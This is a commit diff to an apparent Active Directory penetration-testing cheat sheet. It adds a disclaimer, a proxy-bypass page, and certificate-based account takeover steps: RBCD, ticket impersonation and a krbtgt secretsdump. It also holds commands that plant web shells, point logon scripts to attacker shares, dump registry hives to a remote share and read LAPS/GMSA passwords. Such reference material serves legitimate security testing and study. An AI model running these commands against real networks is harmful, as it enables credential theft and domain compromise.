Disclaimer + Proxy + ESC8 without PKINIT + Markdown Fix

docs/DISCLAIMER.md

@@ -0,0 +1,11 @@
+# DISCLAIMER
+
+The authors and contributors of this repository disclaim any and all responsibility for the misuse of the information, tools, or techniques described herein. The content is provided solely for educational and research purposes. Users are strictly advised to utilize this information in accordance with applicable laws and regulations and only on systems for which they have explicit authorization.
+
+By accessing and using this repository, you agree to:
+
+* Refrain from using the provided information for any unethical or illegal activities.
+* Ensure that all testing and experimentation are conducted responsibly and with proper authorization.
+* Acknowledge that any actions you take based on the contents of this repository are solely your responsibility.
+
+Neither the authors nor contributors shall be held liable for any damages, direct or indirect, resulting from the misuse or unauthorized application of the knowledge contained herein. Always act mindfully, ethically, and within the boundaries of the law.

docs/active-directory/ad-adcs-certificate-services.md

@@ -4,9 +4,21 @@ Active Directory Certificate Services (AD CS) is a Microsoft Windows server role
 
 ## ADCS Enumeration
 
-* netexec: `netexec ldap domain.lab -u username -p password -M adcs`
-* ldapsearch: `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
-* certutil: `certutil.exe -config - -ping`, `certutil -dump`
+* netexec: 
+    ```ps1
+    netexec ldap domain.lab -u username -p password -M adcs
+    ```
+
+* ldapsearch: 
+    ```ps1
+    ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName
+    ```
+
+* certutil: 
+    ```ps1
+    certutil.exe -config - -ping
+    certutil -dump
+    ```
 
 ## Certificate Enrollment
 
@@ -232,11 +244,11 @@ Certify.exe writefile /ca:SERVER\ca-name /path:c:\inetpub\wwwroot\shell.asp
 Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /input:C:\Local\path\shell.php
 ```
 
-## ESC8 - AD CS Relay Attack
+## ESC8 - Web Enrollment Relay
 
 > An attacker can trigger a Domain Controller using PetitPotam to NTLM relay credentials to a host of choice. The Domain Controller’s NTLM Credentials can then be relayed to the Active Directory Certificate Services (AD CS) Web Enrollment pages, and a DC certificate can be enrolled. This certificate can then be used to request a TGT (Ticket Granting Ticket) and compromise the entire domain through Pass-The-Ticket.
 
-Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
+Require [SecureAuthCorp/impacket](https://github.com/SecureAuthCorp/impacket/pull/1101) PR #1101
 
 * **Version 1**: NTLM Relay + Rubeus + PetitPotam
 
@@ -585,6 +597,46 @@ certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
   certipy cert -export -pfx "PATH_TO_PFX_CERT" -password "CERT_PASSWORD" -out "unprotected.pfx"
   ```
 
+
+### PKINIT ERROR
+
+When the DC does not support **PKINIT** (the pre-authentication allowing to retrieve either TGT or NT Hash using certificate). You will get an error like the following in the tool's output.
+
+```ps1
+$ certipy auth -pfx "PATH_TO_PFX_CERT" -dc-ip 'dc-ip' -username 'user' -domain 'domain'
+[...]
+KDC_ERROR_CLIENT_NOT_TRUSTED (Reserved for PKINIT)
+```
+
+There is still a way to use the certificate to takeover the account.
+
+* Open an LDAP shell using the certificate
+    ```ps1
+    certipy auth -pfx target.pfx -debug -username username -domain domain.local -dns-tcp -dc-ip 10.10.10.10 -ldap-shell
+    ```
+
+* Add a computer for RBCD
+    ```ps1
+    impacket-addcomputer -dc-ip 10.10.10.10 DOMAIN.LOCAL/User:P@ssw0rd -computer-name "NEWCOMPUTER" -computer-pass "P@ssw0rd123*"
+    ```
+
+* Set the RBCD
+    ```ps1
+    set_rbcd 'TARGET$' 'NEWCOMPUTER$'
+    ```
+
+* Request a ticket with impersonation
+    ```ps1
+    impacket-getST -spn 'cifs/target.domain.local' -impersonate 'target$' -dc-ip 10.10.10.10 'DOMAIN.LOCAL/NEWCOMPUTER$:P@ssw0rd123*'
+    ```
+
+* Use the ticket
+    ```ps1
+    export KRB5CCNAME=DC$.ccache
+    impacket-secretsdump.py 'target$'@target.domain.local -k -no-pass -dc-ip 10.10.10.10 -just-dc-user 'krbtgt'
+    ```
+
+
 ## UnPAC The Hash
 
 Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User via its certificate.

docs/active-directory/ad-adds-acl-ace.md

@@ -106,7 +106,7 @@ An **Access Control List (ACL)** is a collection of Access Control Entries (ACEs
 		rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" 
 		```
 
-* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : 
+* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script :
 	* Windows/Linux:
 		```ps1
 		bloodyAD --host 10.0.0.5 -d example.lab -u attacker -p 'Password123*' set object delegate scriptpath -v '\\10.0.0.5\totallyLegitScript.bat'
@@ -140,6 +140,7 @@ An **Access Control List (ACL)** is a collection of Access Control Entries (ACEs
 > This tab includes settings that, among other things, can be used to change what program is started when a user connects over the Remote Desktop Protocol (RDP) to a TS/RDSH in place of the normal graphical environment. The settings in the ‘Starting program’ field basically function like a windows shortcut, allowing you to supply either a local or remote (UNC) path to an executable which is to be started upon connecting to the remote host. During the logon process these values will be queried by the RCM process and run whatever executable is defined. - https://sensepost.com/blog/2020/ace-to-rce/
 
 :warning: The RCM is only active on Terminal Servers/Remote Desktop Session Hosts. The RCM has also been disabled on recent version of Windows (>2016), it requires a registry change to re-enable.
+
 * Windows/Linux:
 	```ps1
 	bloodyAD --host 10.10.10.10 -d example.lab -u hacker -p MyPassword123 set object vulnerable_user msTSInitialProgram -v '\\1.2.3.4\share\file.exe'
@@ -196,6 +197,7 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi
 ## WriteOwner
 
 An attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they wants. 
+
 * Windows/Linux:
 	```ps1
 	bloodyAD --host my.dc.corp -d corp -u devil_user1 -p 'P@ssword123' set owner target_object devil_user1
@@ -210,6 +212,7 @@ This ACE can be abused for an Immediate Scheduled Task attack, or for adding a u
 ## ReadLAPSPassword
 
 An attacker can read the LAPS password of the computer account this ACE applies to.
+
 * Windows/Linux:
 	```ps1
 	bloodyAD -u john.doe -d bloody.lab -p Password512 --host 192.168.10.2 get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime
@@ -222,6 +225,7 @@ An attacker can read the LAPS password of the computer account this ACE applies
 ## ReadGMSAPassword
 
 An attacker can read the GMSA password of the account this ACE applies to.
+
 * Windows/Linux:
 	```ps1
 	bloodyAD -u john.doe -d bloody -p Password512 --host 192.168.10.2 get object 'gmsaAccount$' --attr msDS-ManagedPassword
@@ -239,6 +243,7 @@ An attacker can read the GMSA password of the account this ACE applies to.
 ## ForceChangePassword
 
 An attacker can change the password of the user this ACE applies to:
+
 * Windows/Linux:
 	```ps1
 	# Using bloodyAD with pass-the-hash

docs/active-directory/ad-adds-enumerate.md

@@ -11,6 +11,8 @@ Use the appropriate data collector to gather information for **BloodHound** or *
 * [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector)
 * [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
 * [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory  (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel)
+* [c3c/ADExplorerSnapshot.py](https://github.com/c3c/ADExplorerSnapshot.py) - for local Active Directory (Generate BloodHound compatible JSON from AD Explorer snapshot)
+
 
 **Examples**:
 

docs/active-directory/ad-adds-groups.md

@@ -28,14 +28,17 @@ Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
 > The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.
 
 If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by `SDProp` (in an hour).
+
 E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group.
+
 * Windows/Linux:
   ```ps1
   bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 add genericAll 'CN=AdminSDHolder,CN=System,DC=example,DC=lab' john
 
   # Clean up after
   bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 remove genericAll 'CN=AdminSDHolder,CN=System,DC=example,DC=lab' john
   ```
+
 * Windows only:
   ```ps1
   # Add a user to the AdminSDHolder group:
@@ -99,36 +102,46 @@ This groups grants the following privileges :
 - SeBackup privileges
 - SeRestore privileges
 
-* Get members of the group:
-  * Windows/Linux:
+Get members of the group:
+
+* Windows/Linux:
     ```ps1
     bloodyAD --host 10.10.10.10 -d example.lab -u john -p pass123 get object "Backup Operators" --attr msds-memberTransitive
     ```
-  * Windows only:
+
+* Windows only:
     ```ps1
     PowerView> Get-NetGroupMember -Identity "Backup Operators" -Recurse
     ```
-* Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege)
-  ```ps1
-  Import-Module .\SeBackupPrivilegeUtils.dll
-  Import-Module .\SeBackupPrivilegeCmdLets.dll
 
-  Set-SeBackupPrivilege
-  Get-SeBackupPrivilege
-  ```
-* Retrieve sensitive files
-  ```ps1
-  Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
-  ```
-* Retrieve content of AutoLogon in the HKLM\SOFTWARE hive
-  ```ps1
-  $reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64)
-  $winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
-  $winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
-  ```
-* Retrieve SAM,SECURITY and SYSTEM hives
-  * [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\`
-  * [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK`
+Enable privileges using [giuliano108/SeBackupPrivilege](https://github.com/giuliano108/SeBackupPrivilege)
+
+```ps1
+Import-Module .\SeBackupPrivilegeUtils.dll
+Import-Module .\SeBackupPrivilegeCmdLets.dll
+
+Set-SeBackupPrivilege
+Get-SeBackupPrivilege
+```
+
+Retrieve sensitive files
+
+```ps1
+Copy-FileSeBackupPrivilege C:\Users\Administrator\flag.txt C:\Users\Public\flag.txt -Overwrite
+```
+
+Retrieve content of AutoLogon in the `HKLM\SOFTWARE` hive
+
+```ps1
+$reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('LocalMachine', 'dc.htb.local',[Microsoft.Win32.RegistryView]::Registry64)
+$winlogon = $reg.OpenSubKey('SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon')
+$winlogon.GetValueNames() | foreach {"$_ : $(($winlogon).GetValue($_))"}
+```
+
+Retrieve `SAM`,`SECURITY` and `SYSTEM` hives
+
+* [mpgn/BackupOperatorToDA](https://github.com/mpgn/BackupOperatorToDA): `.\BackupOperatorToDA.exe -t \\dc1.lab.local -u user -p pass -d domain -o \\10.10.10.10\SHARE\`
+* [improsec/BackupOperatorToolkit](https://github.com/improsec/BackupOperatorToolkit): `.\BackupOperatorToolkit.exe DUMP \\PATH\To\Dump \\TARGET.DOMAIN.DK`
 
 
 ## References

docs/active-directory/ad-roasting-timeroasting.md

@@ -8,8 +8,8 @@
     hashcat -m 31300 ntp-hashes.txt
     ```
 
-
 ## References
 
-* [Timeroasting: Attacking Trust Accounts in Active Directory - Tom Tervoort - 01 March 2023](https://www.secura.com/blog/timeroasting-attacking-trust-accounts-in-active-directory)
-* [TIMEROASTING, TRUSTROASTING AND COMPUTER SPRAYING WHITE PAPER - Tom Tervoort](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf)
+* [On the Applicability of the Timeroasting Attack - snovvcrash - December 8, 2024](https://snovvcrash.rocks/2024/12/08/applicability-of-the-timeroasting-attack.html)
+* [TIMEROASTING, TRUSTROASTING AND COMPUTER SPRAYING WHITE PAPER - Tom Tervoort](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf)
+* [Timeroasting: Attacking Trust Accounts in Active Directory - Tom Tervoort - 01 March 2023](https://www.secura.com/blog/timeroasting-attacking-trust-accounts-in-active-directory)

docs/redteam/evasion/proxy-bypass.md

@@ -0,0 +1,105 @@
+# Proxy Bypass
+
+> An HTTP proxy server acts as an intermediary between a client (like a web browser) and a web server. It processes client requests for web resources, fetches them from the destination server, and returns them to the client.
+
+## Summary
+
+* [Methodology](#methodology)
+    * [Discover Proxy Configuration](#discover-proxy-configuration)
+    * [PAC Proxy](#pac-proxy)
+    * [Common Bypass](#common-bypass)
+* [References](#references)
+
+## Methodology
+
+### Discover Proxy Configuration
+
+* Windows, in the registry key `DefaultConnectionSettings`
+
+    ```ps1
+    Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
+    Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
+    ```
+
+* Windows:
+
+    ```ps1
+    netsh winhttp show proxy
+    ```
+
+* Linux, in the environment variables `http_proxy` and `https_proxy`
+
+    ```ps1
+    env
+    cat /etc/profile.d/proxy.conf
+    ```
+
+### PAC Proxy
+
+PAC (Proxy Auto-Configuration) is a method to automatically determine whether web traffic should go through a proxy server. It uses a .pac file that contains a JavaScript function called `FindProxyForURL(url, host)`.
+
+* proxy.pac
+* wpad.dat
+
+**Example**:
+
+```ps1
+function FindProxyForURL(url, host) {
+    if (dnsDomainIs(host, '.example.com')) {
+        return 'DIRECT';
+    }
+    return 'PROXY proxy.example.com:8080';
+}
+```
+
+**Tools**:
+
+* [PortSwigger - Proxy Auto Config](https://portswigger.net/bappstore/7b3eae07aa724196ab85a8b64cd095d1) - This extension automatically configures Burp upstream proxies to match desktop proxy settings. This includes support for Proxy Auto-Config (PAC) scripts.
+
+### Common Bypass
+
+* Try several way to reach the Internet
+    * IP address
+    * Domain categorized in Health/Finance
+
+* Use another proxy reachable in the same environment
+
+* Weak regular expression for URL can be abused to bypass the proxy configuration
+
+    ```ps1
+    user:pass@domain/endpoint?parameter#hash
+    e.g: microsoft.com:[email protected]/microsoft.com?microsoft.com#microsoft.com
+    ```
+
+* Trusted Websites: [Living Off Trusted Sites (LOTS) Project](https://lots-project.com/)
+    * Amazon Cloud: AWS endpoints
+    * Microsoft Cloud: Azure endpoints
+    * Google Cloud: GCP endpoints
+    * live.sysinternals.com
+
+* User-Agents
+    * Tools related User-Agent: curl, python, powershell
+
+        ```ps1
+        User-Agent: curl/8.11.0
+        User-Agent: python-requests/2.32.3
+        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; fr-FR) WindowsPowerShell/5.1.26100.2161
+        ```
+
+    * Platform related User-Agent: Android/iOS/Tablet
+
+        ```ps1
+        Mozilla/5.0 (Linux; Android 14; Pixel 9 Build/AD1A.240905.004; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/129.0.6668.78 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/484.0.0.63.83;IABMV/1;] 
+        Mozilla/5.0 (iPhone; CPU iPhone OS 18_0_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 [FBAN/FBIOS;FBAV/485.1.0.45.110;FBBV/665337277;FBDV/iPhone17,1;FBMD/iPhone;FBSN/iOS;FBSV/18.0.1;FBSS/3;FBCR/;FBID/phone;FBLC/it_IT;FBOP/80] 
+        ```
+
+* Domain Fronting
+* Protocols
+    * TCP
+    * Websocket (HTTP)
+    * DNS Exfiltration
+
+## References
+
+* [Proxy managed by enterprise? No problem! Abusing PAC and the registry to get burpin’ - Thomas Grimée - August 17, 2021](https://blog.nviso.eu/2021/08/17/proxy-managed-by-enterprise-no-problem-abusing-pac-and-the-registry-to-get-burpin/)
+* [Proxy: Internal Proxy - MITRE ATT&CK - March 14, 2020](https://attack.mitre.org/versions/v16/techniques/T1090/001/)